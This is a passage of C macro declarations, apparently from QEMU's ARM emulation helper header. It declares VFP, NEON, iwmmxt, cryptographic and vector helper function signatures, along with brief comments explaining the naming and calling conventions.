DEF_HELPER_3(vfp_mind, f64, f64, f64, ptr) DEF_HELPER_3(vfp_maxnums, f32, f32, f32, ptr) DEF_HELPER_3(vfp_maxnumd, f64, f64, f64, ptr) DEF_HELPER_3(vfp_minnums, f32, f32, f32, ptr) DEF_HELPER_3(vfp_minnumd, f64, f64, f64, ptr) DEF_HELPER_1(vfp_negs, f32, f32) DEF_HELPER_1(vfp_negd, f64, f64) DEF_HELPER_1(vfp_abss, f32, f32) DEF_HELPER_1(vfp_absd, f64, f64) DEF_HELPER_2(vfp_sqrts, f32, f32, env) DEF_HELPER_2(vfp_sqrtd, f64, f64, env) DEF_HELPER_3(vfp_cmps, void, f32, f32, env) DEF_HELPER_3(vfp_cmpd, void, f64, f64, env) DEF_HELPER_3(vfp_cmpes, void, f32, f32, env) DEF_HELPER_3(vfp_cmped, void, f64, f64, env) DEF_HELPER_2(vfp_fcvtds, f64, f32, env) DEF_HELPER_2(vfp_fcvtsd, f32, f64, env) DEF_HELPER_2(vfp_uitoh, f16, i32, ptr) DEF_HELPER_2(vfp_uitos, f32, i32, ptr) DEF_HELPER_2(vfp_uitod, f64, i32, ptr) DEF_HELPER_2(vfp_sitoh, f16, i32, ptr) DEF_HELPER_2(vfp_sitos, f32, i32, ptr) DEF_HELPER_2(vfp_sitod, f64, i32, ptr) DEF_HELPER_2(vfp_touih, i32, f16, ptr) DEF_HELPER_2(vfp_touis, i32, f32, ptr) DEF_HELPER_2(vfp_touid, i32, f64, ptr) DEF_HELPER_2(vfp_touizh, i32, f16, ptr) DEF_HELPER_2(vfp_touizs, i32, f32, ptr) DEF_HELPER_2(vfp_touizd, i32, f64, ptr) DEF_HELPER_2(vfp_tosih, s32, f16, ptr) DEF_HELPER_2(vfp_tosis, s32, f32, ptr) DEF_HELPER_2(vfp_tosid, s32, f64, ptr) DEF_HELPER_2(vfp_tosizh, s32, f16, ptr) DEF_HELPER_2(vfp_tosizs, s32, f32, ptr) DEF_HELPER_2(vfp_tosizd, s32, f64, ptr) DEF_HELPER_3(vfp_toshs_round_to_zero, i32, f32, i32, ptr) DEF_HELPER_3(vfp_tosls_round_to_zero, i32, f32, i32, ptr) DEF_HELPER_3(vfp_touhs_round_to_zero, i32, f32, i32, ptr) DEF_HELPER_3(vfp_touls_round_to_zero, i32, f32, i32, ptr) DEF_HELPER_3(vfp_toshd_round_to_zero, i64, f64, i32, ptr) DEF_HELPER_3(vfp_tosld_round_to_zero, i64, f64, i32, ptr) DEF_HELPER_3(vfp_touhd_round_to_zero, i64, f64, i32, ptr) DEF_HELPER_3(vfp_tould_round_to_zero, i64, f64, i32, ptr) DEF_HELPER_3(vfp_touhh, i32, f16, i32, ptr) DEF_HELPER_3(vfp_toshh, i32, f16, i32, ptr) DEF_HELPER_3(vfp_toulh, i32, f16, i32, ptr) DEF_HELPER_3(vfp_toslh, i32, f16, i32, ptr) DEF_HELPER_3(vfp_touqh, i64, 
f16, i32, ptr) DEF_HELPER_3(vfp_tosqh, i64, f16, i32, ptr) DEF_HELPER_3(vfp_toshs, i32, f32, i32, ptr) DEF_HELPER_3(vfp_tosls, i32, f32, i32, ptr) DEF_HELPER_3(vfp_tosqs, i64, f32, i32, ptr) DEF_HELPER_3(vfp_touhs, i32, f32, i32, ptr) DEF_HELPER_3(vfp_touls, i32, f32, i32, ptr) DEF_HELPER_3(vfp_touqs, i64, f32, i32, ptr) DEF_HELPER_3(vfp_toshd, i64, f64, i32, ptr) DEF_HELPER_3(vfp_tosld, i64, f64, i32, ptr) DEF_HELPER_3(vfp_tosqd, i64, f64, i32, ptr) DEF_HELPER_3(vfp_touhd, i64, f64, i32, ptr) DEF_HELPER_3(vfp_tould, i64, f64, i32, ptr) DEF_HELPER_3(vfp_touqd, i64, f64, i32, ptr) DEF_HELPER_3(vfp_shtos, f32, i32, i32, ptr) DEF_HELPER_3(vfp_sltos, f32, i32, i32, ptr) DEF_HELPER_3(vfp_sqtos, f32, i64, i32, ptr) DEF_HELPER_3(vfp_uhtos, f32, i32, i32, ptr) DEF_HELPER_3(vfp_ultos, f32, i32, i32, ptr) DEF_HELPER_3(vfp_uqtos, f32, i64, i32, ptr) DEF_HELPER_3(vfp_shtod, f64, i64, i32, ptr) DEF_HELPER_3(vfp_sltod, f64, i64, i32, ptr) DEF_HELPER_3(vfp_sqtod, f64, i64, i32, ptr) DEF_HELPER_3(vfp_uhtod, f64, i64, i32, ptr) DEF_HELPER_3(vfp_ultod, f64, i64, i32, ptr) DEF_HELPER_3(vfp_uqtod, f64, i64, i32, ptr) DEF_HELPER_3(vfp_sltoh, f16, i32, i32, ptr) DEF_HELPER_3(vfp_ultoh, f16, i32, i32, ptr) DEF_HELPER_3(vfp_sqtoh, f16, i64, i32, ptr) DEF_HELPER_3(vfp_uqtoh, f16, i64, i32, ptr) DEF_HELPER_FLAGS_2(set_rmode, TCG_CALL_NO_RWG, i32, i32, ptr) DEF_HELPER_FLAGS_2(set_neon_rmode, TCG_CALL_NO_RWG, i32, i32, env) DEF_HELPER_FLAGS_3(vfp_fcvt_f16_to_f32, TCG_CALL_NO_RWG, f32, f16, ptr, i32) DEF_HELPER_FLAGS_3(vfp_fcvt_f32_to_f16, TCG_CALL_NO_RWG, f16, f32, ptr, i32) DEF_HELPER_FLAGS_3(vfp_fcvt_f16_to_f64, TCG_CALL_NO_RWG, f64, f16, ptr, i32) DEF_HELPER_FLAGS_3(vfp_fcvt_f64_to_f16, TCG_CALL_NO_RWG, f16, f64, ptr, i32) DEF_HELPER_4(vfp_muladdd, f64, f64, f64, f64, ptr) DEF_HELPER_4(vfp_muladds, f32, f32, f32, f32, ptr) DEF_HELPER_3(recps_f32, f32, f32, f32, env) DEF_HELPER_3(rsqrts_f32, f32, f32, f32, env) DEF_HELPER_FLAGS_2(recpe_f16, TCG_CALL_NO_RWG, f16, f16, ptr) DEF_HELPER_FLAGS_2(recpe_f32, TCG_CALL_NO_RWG, f32, f32, ptr) DEF_HELPER_FLAGS_2(recpe_f64, TCG_CALL_NO_RWG, f64, f64, ptr) DEF_HELPER_FLAGS_2(rsqrte_f16, TCG_CALL_NO_RWG, f16, f16, ptr) DEF_HELPER_FLAGS_2(rsqrte_f32, TCG_CALL_NO_RWG, f32, f32, ptr) DEF_HELPER_FLAGS_2(rsqrte_f64, TCG_CALL_NO_RWG, f64, f64, ptr) DEF_HELPER_2(recpe_u32, i32, i32, ptr) DEF_HELPER_FLAGS_2(rsqrte_u32, TCG_CALL_NO_RWG, i32, i32, ptr) DEF_HELPER_FLAGS_4(neon_tbl, TCG_CALL_NO_RWG, i32, i32, i32, ptr, i32) DEF_HELPER_3(shl_cc, i32, env, i32, i32) DEF_HELPER_3(shr_cc, i32, env, i32, i32) DEF_HELPER_3(sar_cc, i32, env, i32, i32) DEF_HELPER_3(ror_cc, i32, env, i32, i32) DEF_HELPER_FLAGS_2(rints_exact, TCG_CALL_NO_RWG, f32, f32, ptr) DEF_HELPER_FLAGS_2(rintd_exact, TCG_CALL_NO_RWG, f64, f64, ptr) DEF_HELPER_FLAGS_2(rints, TCG_CALL_NO_RWG, f32, f32, ptr) DEF_HELPER_FLAGS_2(rintd, TCG_CALL_NO_RWG, f64, f64, ptr) DEF_HELPER_FLAGS_2(vjcvt, TCG_CALL_NO_RWG, i32, f64, env) DEF_HELPER_FLAGS_2(fjcvtzs, TCG_CALL_NO_RWG, i64, f64, ptr) DEF_HELPER_FLAGS_3(check_hcr_el2_trap, TCG_CALL_NO_WG, void, env, i32, i32) /* neon_helper.c */ DEF_HELPER_FLAGS_3(neon_qadd_u8, TCG_CALL_NO_RWG, i32, env, i32, i32) DEF_HELPER_FLAGS_3(neon_qadd_s8, TCG_CALL_NO_RWG, i32, env, i32, i32) DEF_HELPER_FLAGS_3(neon_qadd_u16, TCG_CALL_NO_RWG, i32, env, i32, i32) DEF_HELPER_FLAGS_3(neon_qadd_s16, TCG_CALL_NO_RWG, i32, env, i32, i32) DEF_HELPER_FLAGS_3(neon_qadd_u32, TCG_CALL_NO_RWG, i32, env, i32, i32) DEF_HELPER_FLAGS_3(neon_qadd_s32, TCG_CALL_NO_RWG, i32, env, i32, i32) DEF_HELPER_FLAGS_3(neon_uqadd_s8, 
TCG_CALL_NO_RWG, i32, env, i32, i32) DEF_HELPER_FLAGS_3(neon_uqadd_s16, TCG_CALL_NO_RWG, i32, env, i32, i32) DEF_HELPER_FLAGS_3(neon_uqadd_s32, TCG_CALL_NO_RWG, i32, env, i32, i32) DEF_HELPER_FLAGS_3(neon_uqadd_s64, TCG_CALL_NO_RWG, i64, env, i64, i64) DEF_HELPER_FLAGS_3(neon_sqadd_u8, TCG_CALL_NO_RWG, i32, env, i32, i32) DEF_HELPER_FLAGS_3(neon_sqadd_u16, TCG_CALL_NO_RWG, i32, env, i32, i32) DEF_HELPER_FLAGS_3(neon_sqadd_u32, TCG_CALL_NO_RWG, i32, env, i32, i32) DEF_HELPER_FLAGS_3(neon_sqadd_u64, TCG_CALL_NO_RWG, i64, env, i64, i64) DEF_HELPER_3(neon_qsub_u8, i32, env, i32, i32) DEF_HELPER_3(neon_qsub_s8, i32, env, i32, i32) DEF_HELPER_3(neon_qsub_u16, i32, env, i32, i32) DEF_HELPER_3(neon_qsub_s16, i32, env, i32, i32) DEF_HELPER_3(neon_qsub_u32, i32, env, i32, i32) DEF_HELPER_3(neon_qsub_s32, i32, env, i32, i32) DEF_HELPER_3(neon_qadd_u64, i64, env, i64, i64) DEF_HELPER_3(neon_qadd_s64, i64, env, i64, i64) DEF_HELPER_3(neon_qsub_u64, i64, env, i64, i64) DEF_HELPER_3(neon_qsub_s64, i64, env, i64, i64) DEF_HELPER_2(neon_hadd_s8, i32, i32, i32) DEF_HELPER_2(neon_hadd_u8, i32, i32, i32) DEF_HELPER_2(neon_hadd_s16, i32, i32, i32) DEF_HELPER_2(neon_hadd_u16, i32, i32, i32) DEF_HELPER_2(neon_hadd_s32, s32, s32, s32) DEF_HELPER_2(neon_hadd_u32, i32, i32, i32) DEF_HELPER_2(neon_rhadd_s8, i32, i32, i32) DEF_HELPER_2(neon_rhadd_u8, i32, i32, i32) DEF_HELPER_2(neon_rhadd_s16, i32, i32, i32) DEF_HELPER_2(neon_rhadd_u16, i32, i32, i32) DEF_HELPER_2(neon_rhadd_s32, s32, s32, s32) DEF_HELPER_2(neon_rhadd_u32, i32, i32, i32) DEF_HELPER_2(neon_hsub_s8, i32, i32, i32) DEF_HELPER_2(neon_hsub_u8, i32, i32, i32) DEF_HELPER_2(neon_hsub_s16, i32, i32, i32) DEF_HELPER_2(neon_hsub_u16, i32, i32, i32) DEF_HELPER_2(neon_hsub_s32, s32, s32, s32) DEF_HELPER_2(neon_hsub_u32, i32, i32, i32) DEF_HELPER_2(neon_cgt_u8, i32, i32, i32) DEF_HELPER_2(neon_cgt_s8, i32, i32, i32) DEF_HELPER_2(neon_cgt_u16, i32, i32, i32) DEF_HELPER_2(neon_cgt_s16, i32, i32, i32) DEF_HELPER_2(neon_cgt_u32, i32, i32, i32) DEF_HELPER_2(neon_cgt_s32, i32, i32, i32) DEF_HELPER_2(neon_cge_u8, i32, i32, i32) DEF_HELPER_2(neon_cge_s8, i32, i32, i32) DEF_HELPER_2(neon_cge_u16, i32, i32, i32) DEF_HELPER_2(neon_cge_s16, i32, i32, i32) DEF_HELPER_2(neon_cge_u32, i32, i32, i32) DEF_HELPER_2(neon_cge_s32, i32, i32, i32) DEF_HELPER_2(neon_pmin_u8, i32, i32, i32) DEF_HELPER_2(neon_pmin_s8, i32, i32, i32) DEF_HELPER_2(neon_pmin_u16, i32, i32, i32) DEF_HELPER_2(neon_pmin_s16, i32, i32, i32) DEF_HELPER_2(neon_pmax_u8, i32, i32, i32) DEF_HELPER_2(neon_pmax_s8, i32, i32, i32) DEF_HELPER_2(neon_pmax_u16, i32, i32, i32) DEF_HELPER_2(neon_pmax_s16, i32, i32, i32) DEF_HELPER_2(neon_abd_u8, i32, i32, i32) DEF_HELPER_2(neon_abd_s8, i32, i32, i32) DEF_HELPER_2(neon_abd_u16, i32, i32, i32) DEF_HELPER_2(neon_abd_s16, i32, i32, i32) DEF_HELPER_2(neon_abd_u32, i32, i32, i32) DEF_HELPER_2(neon_abd_s32, i32, i32, i32) DEF_HELPER_2(neon_shl_u16, i32, i32, i32) DEF_HELPER_2(neon_shl_s16, i32, i32, i32) DEF_HELPER_2(neon_rshl_u8, i32, i32, i32) DEF_HELPER_2(neon_rshl_s8, i32, i32, i32) DEF_HELPER_2(neon_rshl_u16, i32, i32, i32) DEF_HELPER_2(neon_rshl_s16, i32, i32, i32) DEF_HELPER_2(neon_rshl_u32, i32, i32, i32) DEF_HELPER_2(neon_rshl_s32, i32, i32, i32) DEF_HELPER_2(neon_rshl_u64, i64, i64, i64) DEF_HELPER_2(neon_rshl_s64, i64, i64, i64) DEF_HELPER_3(neon_qshl_u8, i32, env, i32, i32) DEF_HELPER_3(neon_qshl_s8, i32, env, i32, i32) DEF_HELPER_3(neon_qshl_u16, i32, env, i32, i32) DEF_HELPER_3(neon_qshl_s16, i32, env, i32, i32) DEF_HELPER_3(neon_qshl_u32, i32, env, i32, i32) 
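/*
 * Naming convention for the neon_* helpers: the suffix gives the
 * element type and width (u8, s16, ...), while the prefixes follow
 * the ARM mnemonics, e.g. q for saturating, r for rounding and h
 * for halving operations.
 */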
DEF_HELPER_3(neon_qshl_s32, i32, env, i32, i32) DEF_HELPER_3(neon_qshl_u64, i64, env, i64, i64) DEF_HELPER_3(neon_qshl_s64, i64, env, i64, i64) DEF_HELPER_3(neon_qshlu_s8, i32, env, i32, i32) DEF_HELPER_3(neon_qshlu_s16, i32, env, i32, i32) DEF_HELPER_3(neon_qshlu_s32, i32, env, i32, i32) DEF_HELPER_3(neon_qshlu_s64, i64, env, i64, i64) DEF_HELPER_3(neon_qrshl_u8, i32, env, i32, i32) DEF_HELPER_3(neon_qrshl_s8, i32, env, i32, i32) DEF_HELPER_3(neon_qrshl_u16, i32, env, i32, i32) DEF_HELPER_3(neon_qrshl_s16, i32, env, i32, i32) DEF_HELPER_3(neon_qrshl_u32, i32, env, i32, i32) DEF_HELPER_3(neon_qrshl_s32, i32, env, i32, i32) DEF_HELPER_3(neon_qrshl_u64, i64, env, i64, i64) DEF_HELPER_3(neon_qrshl_s64, i64, env, i64, i64) DEF_HELPER_2(neon_add_u8, i32, i32, i32) DEF_HELPER_2(neon_add_u16, i32, i32, i32) DEF_HELPER_2(neon_padd_u8, i32, i32, i32) DEF_HELPER_2(neon_padd_u16, i32, i32, i32) DEF_HELPER_2(neon_sub_u8, i32, i32, i32) DEF_HELPER_2(neon_sub_u16, i32, i32, i32) DEF_HELPER_2(neon_mul_u8, i32, i32, i32) DEF_HELPER_2(neon_mul_u16, i32, i32, i32) DEF_HELPER_2(neon_tst_u8, i32, i32, i32) DEF_HELPER_2(neon_tst_u16, i32, i32, i32) DEF_HELPER_2(neon_tst_u32, i32, i32, i32) DEF_HELPER_2(neon_ceq_u8, i32, i32, i32) DEF_HELPER_2(neon_ceq_u16, i32, i32, i32) DEF_HELPER_2(neon_ceq_u32, i32, i32, i32) DEF_HELPER_1(neon_clz_u8, i32, i32) DEF_HELPER_1(neon_clz_u16, i32, i32) DEF_HELPER_1(neon_cls_s8, i32, i32) DEF_HELPER_1(neon_cls_s16, i32, i32) DEF_HELPER_1(neon_cls_s32, i32, i32) DEF_HELPER_1(neon_cnt_u8, i32, i32) DEF_HELPER_FLAGS_1(neon_rbit_u8, TCG_CALL_NO_RWG_SE, i32, i32) DEF_HELPER_3(neon_qdmulh_s16, i32, env, i32, i32) DEF_HELPER_3(neon_qrdmulh_s16, i32, env, i32, i32) DEF_HELPER_4(neon_qrdmlah_s16, i32, env, i32, i32, i32) DEF_HELPER_4(neon_qrdmlsh_s16, i32, env, i32, i32, i32) DEF_HELPER_3(neon_qdmulh_s32, i32, env, i32, i32) DEF_HELPER_3(neon_qrdmulh_s32, i32, env, i32, i32) DEF_HELPER_4(neon_qrdmlah_s32, i32, env, s32, s32, s32) DEF_HELPER_4(neon_qrdmlsh_s32, i32, env, s32, s32, s32) DEF_HELPER_1(neon_narrow_u8, i32, i64) DEF_HELPER_1(neon_narrow_u16, i32, i64) DEF_HELPER_2(neon_unarrow_sat8, i32, env, i64) DEF_HELPER_2(neon_narrow_sat_u8, i32, env, i64) DEF_HELPER_2(neon_narrow_sat_s8, i32, env, i64) DEF_HELPER_2(neon_unarrow_sat16, i32, env, i64) DEF_HELPER_2(neon_narrow_sat_u16, i32, env, i64) DEF_HELPER_2(neon_narrow_sat_s16, i32, env, i64) DEF_HELPER_2(neon_unarrow_sat32, i32, env, i64) DEF_HELPER_2(neon_narrow_sat_u32, i32, env, i64) DEF_HELPER_2(neon_narrow_sat_s32, i32, env, i64) DEF_HELPER_1(neon_narrow_high_u8, i32, i64) DEF_HELPER_1(neon_narrow_high_u16, i32, i64) DEF_HELPER_1(neon_narrow_round_high_u8, i32, i64) DEF_HELPER_1(neon_narrow_round_high_u16, i32, i64) DEF_HELPER_1(neon_widen_u8, i64, i32) DEF_HELPER_1(neon_widen_s8, i64, i32) DEF_HELPER_1(neon_widen_u16, i64, i32) DEF_HELPER_1(neon_widen_s16, i64, i32) DEF_HELPER_2(neon_addl_u16, i64, i64, i64) DEF_HELPER_2(neon_addl_u32, i64, i64, i64) DEF_HELPER_2(neon_paddl_u16, i64, i64, i64) DEF_HELPER_2(neon_paddl_u32, i64, i64, i64) DEF_HELPER_2(neon_subl_u16, i64, i64, i64) DEF_HELPER_2(neon_subl_u32, i64, i64, i64) DEF_HELPER_3(neon_addl_saturate_s32, i64, env, i64, i64) DEF_HELPER_3(neon_addl_saturate_s64, i64, env, i64, i64) DEF_HELPER_2(neon_abdl_u16, i64, i32, i32) DEF_HELPER_2(neon_abdl_s16, i64, i32, i32) DEF_HELPER_2(neon_abdl_u32, i64, i32, i32) DEF_HELPER_2(neon_abdl_s32, i64, i32, i32) DEF_HELPER_2(neon_abdl_u64, i64, i32, i32) DEF_HELPER_2(neon_abdl_s64, i64, i32, i32) DEF_HELPER_2(neon_mull_u8, i64, i32, i32) 
DEF_HELPER_2(neon_mull_s8, i64, i32, i32) DEF_HELPER_2(neon_mull_u16, i64, i32, i32) DEF_HELPER_2(neon_mull_s16, i64, i32, i32) DEF_HELPER_1(neon_negl_u16, i64, i64) DEF_HELPER_1(neon_negl_u32, i64, i64) DEF_HELPER_FLAGS_2(neon_qabs_s8, TCG_CALL_NO_RWG, i32, env, i32) DEF_HELPER_FLAGS_2(neon_qabs_s16, TCG_CALL_NO_RWG, i32, env, i32) DEF_HELPER_FLAGS_2(neon_qabs_s32, TCG_CALL_NO_RWG, i32, env, i32) DEF_HELPER_FLAGS_2(neon_qabs_s64, TCG_CALL_NO_RWG, i64, env, i64) DEF_HELPER_FLAGS_2(neon_qneg_s8, TCG_CALL_NO_RWG, i32, env, i32) DEF_HELPER_FLAGS_2(neon_qneg_s16, TCG_CALL_NO_RWG, i32, env, i32) DEF_HELPER_FLAGS_2(neon_qneg_s32, TCG_CALL_NO_RWG, i32, env, i32) DEF_HELPER_FLAGS_2(neon_qneg_s64, TCG_CALL_NO_RWG, i64, env, i64) DEF_HELPER_3(neon_abd_f32, i32, i32, i32, ptr) DEF_HELPER_3(neon_ceq_f32, i32, i32, i32, ptr) DEF_HELPER_3(neon_cge_f32, i32, i32, i32, ptr) DEF_HELPER_3(neon_cgt_f32, i32, i32, i32, ptr) DEF_HELPER_3(neon_acge_f32, i32, i32, i32, ptr) DEF_HELPER_3(neon_acgt_f32, i32, i32, i32, ptr) DEF_HELPER_3(neon_acge_f64, i64, i64, i64, ptr) DEF_HELPER_3(neon_acgt_f64, i64, i64, i64, ptr) /* iwmmxt_helper.c */ DEF_HELPER_2(iwmmxt_maddsq, i64, i64, i64) DEF_HELPER_2(iwmmxt_madduq, i64, i64, i64) DEF_HELPER_2(iwmmxt_sadb, i64, i64, i64) DEF_HELPER_2(iwmmxt_sadw, i64, i64, i64) DEF_HELPER_2(iwmmxt_mulslw, i64, i64, i64) DEF_HELPER_2(iwmmxt_mulshw, i64, i64, i64) DEF_HELPER_2(iwmmxt_mululw, i64, i64, i64) DEF_HELPER_2(iwmmxt_muluhw, i64, i64, i64) DEF_HELPER_2(iwmmxt_macsw, i64, i64, i64) DEF_HELPER_2(iwmmxt_macuw, i64, i64, i64) DEF_HELPER_1(iwmmxt_setpsr_nz, i32, i64) #define DEF_IWMMXT_HELPER_SIZE_ENV(name) \ DEF_HELPER_3(iwmmxt_##name##b, i64, env, i64, i64) \ DEF_HELPER_3(iwmmxt_##name##w, i64, env, i64, i64) \ DEF_HELPER_3(iwmmxt_##name##l, i64, env, i64, i64) \ DEF_IWMMXT_HELPER_SIZE_ENV(unpackl) DEF_IWMMXT_HELPER_SIZE_ENV(unpackh) DEF_HELPER_2(iwmmxt_unpacklub, i64, env, i64) DEF_HELPER_2(iwmmxt_unpackluw, i64, env, i64) DEF_HELPER_2(iwmmxt_unpacklul, i64, env, i64) DEF_HELPER_2(iwmmxt_unpackhub, i64, env, i64) DEF_HELPER_2(iwmmxt_unpackhuw, i64, env, i64) DEF_HELPER_2(iwmmxt_unpackhul, i64, env, i64) DEF_HELPER_2(iwmmxt_unpacklsb, i64, env, i64) DEF_HELPER_2(iwmmxt_unpacklsw, i64, env, i64) DEF_HELPER_2(iwmmxt_unpacklsl, i64, env, i64) DEF_HELPER_2(iwmmxt_unpackhsb, i64, env, i64) DEF_HELPER_2(iwmmxt_unpackhsw, i64, env, i64) DEF_HELPER_2(iwmmxt_unpackhsl, i64, env, i64) DEF_IWMMXT_HELPER_SIZE_ENV(cmpeq) DEF_IWMMXT_HELPER_SIZE_ENV(cmpgtu) DEF_IWMMXT_HELPER_SIZE_ENV(cmpgts) DEF_IWMMXT_HELPER_SIZE_ENV(mins) DEF_IWMMXT_HELPER_SIZE_ENV(minu) DEF_IWMMXT_HELPER_SIZE_ENV(maxs) DEF_IWMMXT_HELPER_SIZE_ENV(maxu) DEF_IWMMXT_HELPER_SIZE_ENV(subn) DEF_IWMMXT_HELPER_SIZE_ENV(addn) DEF_IWMMXT_HELPER_SIZE_ENV(subu) DEF_IWMMXT_HELPER_SIZE_ENV(addu) DEF_IWMMXT_HELPER_SIZE_ENV(subs) DEF_IWMMXT_HELPER_SIZE_ENV(adds) DEF_HELPER_3(iwmmxt_avgb0, i64, env, i64, i64) DEF_HELPER_3(iwmmxt_avgb1, i64, env, i64, i64) DEF_HELPER_3(iwmmxt_avgw0, i64, env, i64, i64) DEF_HELPER_3(iwmmxt_avgw1, i64, env, i64, i64) DEF_HELPER_3(iwmmxt_align, i64, i64, i64, i32) DEF_HELPER_4(iwmmxt_insr, i64, i64, i32, i32, i32) DEF_HELPER_1(iwmmxt_bcstb, i64, i32) DEF_HELPER_1(iwmmxt_bcstw, i64, i32) DEF_HELPER_1(iwmmxt_bcstl, i64, i32) DEF_HELPER_1(iwmmxt_addcb, i64, i64) DEF_HELPER_1(iwmmxt_addcw, i64, i64) DEF_HELPER_1(iwmmxt_addcl, i64, i64) DEF_HELPER_1(iwmmxt_msbb, i32, i64) DEF_HELPER_1(iwmmxt_msbw, i32, i64) DEF_HELPER_1(iwmmxt_msbl, i32, i64) DEF_HELPER_3(iwmmxt_srlw, i64, env, i64, i32) DEF_HELPER_3(iwmmxt_srll, i64, env, 
i64, i32) DEF_HELPER_3(iwmmxt_srlq, i64, env, i64, i32) DEF_HELPER_3(iwmmxt_sllw, i64, env, i64, i32) DEF_HELPER_3(iwmmxt_slll, i64, env, i64, i32) DEF_HELPER_3(iwmmxt_sllq, i64, env, i64, i32) DEF_HELPER_3(iwmmxt_sraw, i64, env, i64, i32) DEF_HELPER_3(iwmmxt_sral, i64, env, i64, i32) DEF_HELPER_3(iwmmxt_sraq, i64, env, i64, i32) DEF_HELPER_3(iwmmxt_rorw, i64, env, i64, i32) DEF_HELPER_3(iwmmxt_rorl, i64, env, i64, i32) DEF_HELPER_3(iwmmxt_rorq, i64, env, i64, i32) DEF_HELPER_3(iwmmxt_shufh, i64, env, i64, i32) DEF_HELPER_3(iwmmxt_packuw, i64, env, i64, i64) DEF_HELPER_3(iwmmxt_packul, i64, env, i64, i64) DEF_HELPER_3(iwmmxt_packuq, i64, env, i64, i64) DEF_HELPER_3(iwmmxt_packsw, i64, env, i64, i64) DEF_HELPER_3(iwmmxt_packsl, i64, env, i64, i64) DEF_HELPER_3(iwmmxt_packsq, i64, env, i64, i64) DEF_HELPER_3(iwmmxt_muladdsl, i64, i64, i32, i32) DEF_HELPER_3(iwmmxt_muladdsw, i64, i64, i32, i32) DEF_HELPER_3(iwmmxt_muladdswl, i64, i64, i32, i32) DEF_HELPER_FLAGS_2(neon_unzip8, TCG_CALL_NO_RWG, void, ptr, ptr) DEF_HELPER_FLAGS_2(neon_unzip16, TCG_CALL_NO_RWG, void, ptr, ptr) DEF_HELPER_FLAGS_2(neon_qunzip8, TCG_CALL_NO_RWG, void, ptr, ptr) DEF_HELPER_FLAGS_2(neon_qunzip16, TCG_CALL_NO_RWG, void, ptr, ptr) DEF_HELPER_FLAGS_2(neon_qunzip32, TCG_CALL_NO_RWG, void, ptr, ptr) DEF_HELPER_FLAGS_2(neon_zip8, TCG_CALL_NO_RWG, void, ptr, ptr) DEF_HELPER_FLAGS_2(neon_zip16, TCG_CALL_NO_RWG, void, ptr, ptr) DEF_HELPER_FLAGS_2(neon_qzip8, TCG_CALL_NO_RWG, void, ptr, ptr) DEF_HELPER_FLAGS_2(neon_qzip16, TCG_CALL_NO_RWG, void, ptr, ptr) DEF_HELPER_FLAGS_2(neon_qzip32, TCG_CALL_NO_RWG, void, ptr, ptr) DEF_HELPER_FLAGS_3(crypto_aese, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(crypto_aesmc, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_4(crypto_sha1_3reg, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_2(crypto_sha1h, TCG_CALL_NO_RWG, void, ptr, ptr) DEF_HELPER_FLAGS_2(crypto_sha1su1, TCG_CALL_NO_RWG, void, ptr, ptr) DEF_HELPER_FLAGS_3(crypto_sha256h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr) DEF_HELPER_FLAGS_3(crypto_sha256h2, TCG_CALL_NO_RWG, void, ptr, ptr, ptr) DEF_HELPER_FLAGS_2(crypto_sha256su0, TCG_CALL_NO_RWG, void, ptr, ptr) DEF_HELPER_FLAGS_3(crypto_sha256su1, TCG_CALL_NO_RWG, void, ptr, ptr, ptr) DEF_HELPER_FLAGS_3(crypto_sha512h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr) DEF_HELPER_FLAGS_3(crypto_sha512h2, TCG_CALL_NO_RWG, void, ptr, ptr, ptr) DEF_HELPER_FLAGS_2(crypto_sha512su0, TCG_CALL_NO_RWG, void, ptr, ptr) DEF_HELPER_FLAGS_3(crypto_sha512su1, TCG_CALL_NO_RWG, void, ptr, ptr, ptr) DEF_HELPER_FLAGS_5(crypto_sm3tt, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32, i32) DEF_HELPER_FLAGS_3(crypto_sm3partw1, TCG_CALL_NO_RWG, void, ptr, ptr, ptr) DEF_HELPER_FLAGS_3(crypto_sm3partw2, TCG_CALL_NO_RWG, void, ptr, ptr, ptr) DEF_HELPER_FLAGS_2(crypto_sm4e, TCG_CALL_NO_RWG, void, ptr, ptr) DEF_HELPER_FLAGS_3(crypto_sm4ekey, TCG_CALL_NO_RWG, void, ptr, ptr, ptr) DEF_HELPER_FLAGS_3(crc32, TCG_CALL_NO_RWG_SE, i32, i32, i32, i32) DEF_HELPER_FLAGS_3(crc32c, TCG_CALL_NO_RWG_SE, i32, i32, i32, i32) DEF_HELPER_FLAGS_5(gvec_qrdmlah_s16, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_qrdmlsh_s16, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_qrdmlah_s32, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_qrdmlsh_s32, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_sdot_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_udot_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) 
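/*
 * The gvec_* helpers share one calling convention: pointers into the
 * CPU vector registers, plus a 32-bit descriptor built by simd_desc()
 * which packs the operation and maximum vector sizes.
 */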
